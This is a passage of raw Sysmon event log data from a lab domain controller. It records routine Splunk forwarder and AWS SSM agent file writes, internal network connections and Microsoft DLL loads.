Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:23.306{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AA65350AC0D3A767C26EF3D52FB305,SHA256=F5C748546E7B7C4ABD6BD639A47F11207D5FA037585656C5DE403E55EA41C7D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:21.530{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53313-false10.0.1.12-8089- 23542300x800000000000000098529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:24.400{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E695B45178C25D7B371B69C2D9E0C03C,SHA256=D64B6B434AEA4B213B390D62E30B8F530118557D9CFC71A5B495398C9F97FA19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:25.494{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CEF17A995A8BCC0F096C9E3A0FCE2F4,SHA256=247C119074EF5C4B299DDC68D7BFFA759659694A13A18F82911D9073B4332B4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:26.587{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEBF729C1A2D123377DA0D7C348A8DB8,SHA256=24844F51732181C683292774DA2EEC6D180F2AC1B7BA63BA61FF682C140180D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:27.681{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D0171110ABD3919A492F159E9A91CA1,SHA256=4A66D78D9E631D587615A2A4204B8B2746244B0551FA9DA4323876214F366F72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:28.775{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08275C56CE398DBCC62B5948860A40A6,SHA256=844CB72AB46872968D2B4D0D0A9C56D69A5DB12E814F4EC8286F6C009BA9D7F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:24.046{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53314-false10.0.1.12-8000- 23542300x800000000000000098536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:29.869{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=290E66ABB2C5BB8442CAC50D4AA13598,SHA256=D33BD1636176F8C4351D545B01D83B34713B1A92D6D4917AF9A9306F7BD34701,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:30.962{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79CB18B942C9E4638BB7A586809359AE,SHA256=1273BCC5AF5CEF9F45ED3CEBA375CAFB4C9A17EE132F5E568929F7069A17B42A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:32.056{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AD9A8469E3BF06F030A7E353B34ECFA,SHA256=968A9DBBEAF658354C1B9055C68AC3EF9B7D2D88D0BD68BA2EFD1C1AE2E52114,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:29.061{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53315-false10.0.1.12-8000- 23542300x800000000000000098539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:33.166{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C42BDB6D2A01991F44D9905FFAD3928,SHA256=21AC60E1236BEC9E32FB56E6DE54857BC63D2581A30E6BF1C8C0AD565C782705,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:34.259{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAFC3D0C9BBEACA1E28B661254CD032,SHA256=7992C8B9A24D33F640FAC350502FD70A4E2BF7D3BB4269219E861DCFB46428D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:35.353{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA89AAE95E279E0DCC1795FEF226D846,SHA256=35ECC73449180F351DAFB8BD798698AD8E4C6B53DFAA77CC8BE14139ADE63B9E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:36.447{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDA8F3903E5736150B2CE83FFF0E124,SHA256=86C84B1E1C2900EC80208FFF6DF2A9C3750E3DD9C97E6DF168A0964F622F55B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:37.540{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D6C361A2738F446D89B876234B87C24,SHA256=D1EF77FFAD4EE1369D6B036BFD8D02FEDF484EB6A401AEAB8093DFF55E70328B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:38.634{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0424E29183B4F3F9B39019653DF09DF,SHA256=3A4F22B46D3C10055EAB968F8CA8D00287816FB9BD979B6C1BE44A4CB87CFA80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:35.030{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53316-false10.0.1.12-8000- 23542300x800000000000000098547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:39.728{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8818B7987C882A2FEF57B7915265E76,SHA256=ABB336FB5DDE91FC70A1B0C4240ED14634FC385B77E440D0330DDF5B1E3931CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:40.822{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E85763F28AEEE220EDD2FBCC8C3FFE,SHA256=0A0BF4785636298DD22E4B97F66BC6D5BEE2903CC932F233B074FD1F4186FEA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:41.904{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F43B86B99FCE2048A7E00141D484EFC6,SHA256=7A5D48DAC8386B31C1A56FE6684AA8ED3046C8466DF13C562E21AC4E719D67D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:41.795{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\respondent-20220530105428-125MD5=3A7897B317CA03B79FE07533175F9643,SHA256=F76FF17815B8F96571634A983322FD544389A7130FC207258DDFB92658757A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:42.996{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=671EE2752952116AC24C5F03DD265B17,SHA256=A92F5883586DBB200106272C21F632EE026F6D2F14BD9D0520338DC83FFDD102,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:42.795{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\surveyor-20220530105426-126MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:43.546{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E64B32CD1AF21994C326A309262ACE0,SHA256=D8A49BBFD433C3EE66721C787F21A7AE56725D4E6857F2B02FF3FB8A05BAB4E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:40.097{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53317-false10.0.1.12-8000- 354300x800000000000000098557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:40.409{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53318-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000098556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:40.409{326FD73D-A262-6294-2300-000000005502}2720C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53318-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 23542300x800000000000000098555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:44.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E8D221B53513A8759C32EA9313C5F95,SHA256=CC7091CDCA060A33AEE81A3BA03772C3CB82282192CC4A872810414F4BED3D91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.874{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.874{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.874{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.859{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 